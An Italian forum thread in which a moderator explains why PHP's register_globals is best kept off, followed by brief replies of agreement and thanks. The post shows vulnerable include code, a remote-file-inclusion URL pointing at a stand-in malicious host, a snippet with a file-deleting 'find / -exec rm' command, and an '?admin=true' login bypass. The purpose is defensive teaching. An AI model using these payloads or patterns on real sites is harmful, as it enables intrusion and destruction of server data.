» [Pillola] Consigli sul perchè mantenere register_globals su OFF

ilnetsurfer · 31-12-08, 14:12

Salve a tutti e benvenuti in questo tutorial

dove spiegherò(in seguito ad un altro topic) i motivi per cui è consigliabile avere register_globals del file php.ini impostato su OFF...
Cominciamo!
Innanzitutto, ricordiamo che register globals permette di usare una variabile già pronta con i parametri get e post(Ma anche altri)..Ovvero che una banalissima variabile può sostituire egregiamente i famosi array superglobali($_GET,$_POST, ecc..)
un esempio con $_GET :

Codice:

 pagina.php?var=2

Se register_globals è on, invece di usare $_POST['var'] come variabile superglobale, si userà $var come variabile superglobale.
E quindi, se facciamo l'echo di $var

<span class="gal">

Codice PHP:


			
echo $var ;

Avremo come risultato 2.
Register_globals è sconsigliata perchè un hacker potrebbe inserire codice maligno a nostra insaputa.
Considerando questo esempio molto semplificato(Tratto dal mio libro di programmazione)

Codice PHP:


			
<?php

mysql_query(.......);
echo "....";
//ecc...
include $module.'.php';
?>

Se register globals è su on, un hacker potrebbe modificare l'url cosi:
lapaginaconinclude.php?module=http://www.esempio.com/script_malevolo
E cosi la pagina php includerebbe http://www.esempio.com/script_malevolo.php
Che puo contere chissà quale codice, ad esempio

Codice PHP:


			
<?php 'find /-exec rm"{}" ";"';?>

Che cancellerebbe tutti i file accessibili al server web, oppure contenere anche banali unlink() , chdir() , fopen o fwrite...

Un altro esempio?

Codice PHP:


			
<?php
session_start()
//$admin + una variabile di sessione impostata in precedenza
if(!$admin) {
do_foo();
}else{
do_admin_task();
}
?>

Se un hacker modificasse l'url così:
paginaconadmin.php?admin=true
Potrebbe entrare con i privilegi di amministratore...
Per questo è consigliabile non fidarsi mai dell'utente, impostare tutte le precauzioni necessarie e soprattutto mantenere register_globals su off!

Con questo minitutorial spero di essere stato utile...

Ola!

Jeeves · 01-01-09, 20:17

Si infatti ilnetsurfer hai pienamente ragione, infatti se non lo scrivevi tu questo tutorial dovevo farlo io

laboo · 22-07-09, 20:28

Hai centrato il problema. Ho risolto, grazie mille!

31-12-08, 14:12	#1 (permalink)
ilnetsurfer Moderatore Data di registrazione: Jun 2007 Ubicazione: Napoli Messaggi: 535	[Pillola] Consigli sul perchè mantenere register_globals su OFF Salve a tutti e benvenuti in questo tutorial dove spiegherò(in seguito ad un altro topic) i motivi per cui è consigliabile avere register_globals del file php.ini impostato su OFF... Cominciamo! Innanzitutto, ricordiamo che register globals permette di usare una variabile già pronta con i parametri get e post(Ma anche altri)..Ovvero che una banalissima variabile può sostituire egregiamente i famosi array superglobali($_GET,$_POST, ecc..) un esempio con $_GET : Codice: pagina.php?var=2 Se register_globals è on, invece di usare $_POST['var'] come variabile superglobale, si userà $var come variabile superglobale. E quindi, se facciamo l'echo di $var <span class="gal"> Codice PHP: `echo $var ;` Avremo come risultato 2. Register_globals è sconsigliata perchè un hacker potrebbe inserire codice maligno a nostra insaputa. Considerando questo esempio molto semplificato(Tratto dal mio libro di programmazione) Codice PHP: `<?php mysql_query(.......); echo "...."; //ecc... include $module.'.php'; ?>` Se register globals è su on, un hacker potrebbe modificare l'url cosi: lapaginaconinclude.php?module=http://www.esempio.com/script_malevolo E cosi la pagina php includerebbe http://www.esempio.com/script_malevolo.php Che puo contere chissà quale codice, ad esempio Codice PHP: `<?php 'find /-exec rm"{}" ";"';?>` Che cancellerebbe tutti i file accessibili al server web, oppure contenere anche banali unlink() , chdir() , fopen o fwrite... Un altro esempio? Codice PHP: `<?php session_start() //$admin + una variabile di sessione impostata in precedenza if(!$admin) { do_foo(); }else{ do_admin_task(); } ?>` Se un hacker modificasse l'url così: paginaconadmin.php?admin=true Potrebbe entrare con i privilegi di amministratore... Per questo è consigliabile non fidarsi mai dell'utente, impostare tutte le precauzioni necessarie e soprattutto mantenere register_globals su off! Con questo minitutorial spero di essere stato utile... Ola!
	__________________ He knows not where he's going.For the ocean will decide.It's not the DESTINATION...It's the glory of the RIDE.

22-07-09, 20:28	#3 (permalink)
laboo User Data di registrazione: Jun 2006 Messaggi: 423	Hai centrato il problema. Ho risolto, grazie mille!
	__________________ Laboo.biz!

Condividi questo contenuto nei Social Network:		Tweet
Ti stiamo aspettando: Registrati subito e gratis. Entra a far parte di una delle comunità più attive in Italia. Se hai dimenticato i tuoi dati li puoi recuperare subito.

01-01-09, 20:17	#2 (permalink)
Jeeves Esperto Data di registrazione: May 2008 Messaggi: 333	Si infatti ilnetsurfer hai pienamente ragione, infatti se non lo scrivevi tu questo tutorial dovevo farlo io

Strumenti di discussione
Visualizza la versione stampabile Invia la pagina tramite email